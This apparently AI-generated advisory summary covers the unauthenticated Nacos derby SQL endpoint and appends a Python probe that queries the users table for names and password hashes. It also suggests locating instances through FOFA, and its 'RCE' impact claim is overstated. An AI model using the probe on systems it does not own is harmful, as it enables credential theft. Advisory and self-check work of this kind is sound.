This is a summary of the AI-generated 10-question deep analysis.
Q1: What is this vulnerability? (Essence + Consequences)
**Essence**: Alibaba Nacos has a missing-authentication flaw (CWE-306, Missing Authentication for Critical Function) in `ConfigOpsController`: the controller lets unauthenticated users perform dangerous administrative operations.…
**Root Cause**: Missing access control on specific endpoints of that controller. While `/data/remove` is secured, the `/derby` endpoint is **not protected** by the `@Secured` annotation, so requests to it are served without any authentication check.…
**Threshold**: **LOW**. No credentials and no user interaction are required. **Config**: Only requires the service to be running with the default embedded Derby storage, which is the database the endpoint queries (deployments backed by an external MySQL database do not expose their data through it). No special configuration is needed for exploitation.…
**Self-Check**: Scan for Nacos instances using FOFA (`app="Nacos"`), then check each instance's version and storage mode. **Test**: Send an unauthenticated GET request to `/nacos/v1/cs/ops/derby?sql=select * from users` (URL-encode the query). An HTTP 200 with a JSON body containing row data (user names and password hashes from the `users` table) confirms the flaw; a 401/403 means the endpoint is protected on that build.…
**Official Fix**: **YES**. Patched in Nacos version **1.4.1** and later. **Action**: Upgrade immediately. If the upgrade has to wait, block `/nacos/v1/cs/ops/` from untrusted networks at the reverse proxy or firewall as a stop-gap; simply enabling Nacos authentication does not help, because the endpoint lacks the `@Secured` annotation that would enforce it. **PR**: See GitHub PR #4517 for details.
**Urgency**: **CRITICAL**. Priority: **P1**. **Time**: Patch immediately. **Risk**: High CVSS score. The vector given is AV:N/AC:L/PR:N/S:C/C:H/I:N/A:N; note that it omits the UI metric and that its I:N/A:N components do not match the data-loss impact stated under Impact, so treat the vector as approximate and the Critical rating as operative. **Impact**: Complete data loss or RCE. Do not delay remediation.
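The self-check above, as an added example that is not part of the original page or of the Nacos project: a small Python probe that builds the `/nacos/v1/cs/ops/derby` request, classifies the reply, and compares a reported version against the fixed release the page names (1.4.1). The JSON shape it expects (`{"code": ..., "message": ..., "data": ...}`) is Nacos's RestResult envelope; the `SAMPLE_*` replies and the `refused` classification for non-Derby backends are constructed assumptions for offline use, not captured server output.

```python
"""Probe helper for the unauthenticated Nacos /v1/cs/ops/derby endpoint.

Added example; not code from the page or from the Nacos project. Assumes the
RestResult JSON envelope {"code", "message", "data"}. Sample replies below
are constructed for offline testing, not captured from a real server.
"""
import json
import sys
import urllib.error
import urllib.parse
import urllib.request

# The page's own test query. Any read-only Derby statement works here.
DEFAULT_SQL = "select * from users"

# Fixed release as stated on the page.
FIXED_VERSION = (1, 4, 1)


def build_probe_url(base_url: str, sql: str = DEFAULT_SQL) -> str:
    """Return the full derby-endpoint URL with the SQL statement URL-encoded."""
    base = base_url.rstrip("/")
    if not base.endswith("/nacos"):
        base += "/nacos"
    return f"{base}/v1/cs/ops/derby?" + urllib.parse.urlencode({"sql": sql})


def classify_response(status: int, body: str) -> str:
    """Classify a derby-endpoint reply.

    'vulnerable' - HTTP 200, RestResult code 200 and a list of rows: the
                   server ran our SQL without authentication
    'protected'  - HTTP 401/403: authentication is enforced on this path
    'refused'    - a RestResult with a non-200 code (assumption: what a
                   non-Derby backend or a failed statement returns)
    'unknown'    - anything else (not Nacos, proxy error, HTML page, ...)
    """
    if status in (401, 403):
        return "protected"
    try:
        result = json.loads(body)
    except ValueError:
        return "unknown"
    if not isinstance(result, dict):
        return "unknown"
    if status == 200 and result.get("code") == 200 and isinstance(result.get("data"), list):
        return "vulnerable"
    if "code" in result:
        return "refused"
    return "unknown"


def version_is_fixed(version: str) -> bool:
    """True if a reported Nacos version is >= 1.4.1 (e.g. '1.4.0', '2.0.3-BETA')."""
    numeric = version.split("-")[0]
    parts = tuple(int(p) for p in numeric.split(".") if p.isdigit())
    return parts >= FIXED_VERSION


def probe(base_url: str, sql: str = DEFAULT_SQL, timeout: float = 5.0) -> str:
    """Send the unauthenticated GET and classify the answer; network errors map to 'unknown'."""
    req = urllib.request.Request(build_probe_url(base_url, sql),
                                 headers={"User-Agent": "nacos-derby-check"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return classify_response(resp.status, resp.read().decode("utf-8", "replace"))
    except urllib.error.HTTPError as err:
        return classify_response(err.code, err.read().decode("utf-8", "replace"))
    except (urllib.error.URLError, OSError):
        return "unknown"


# Constructed sample replies (not captured from a real host).
SAMPLE_OPEN = json.dumps({"code": 200, "message": None,
                          "data": [{"USERNAME": "nacos", "PASSWORD": "<bcrypt-hash>",
                                    "ENABLED": True}]})
SAMPLE_DENIED = json.dumps({"code": 403, "message": "authorization failed!", "data": None})
SAMPLE_REFUSED = json.dumps({"code": 500, "message": "statement rejected", "data": None})


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "http://127.0.0.1:8848"
    print(target, "->", probe(target))
```

Run it against one base URL (`python probe.py http://host:8848`); a result of `vulnerable` means the endpoint answered the query with rows and the instance needs the 1.4.1 upgrade regardless of what its version string says.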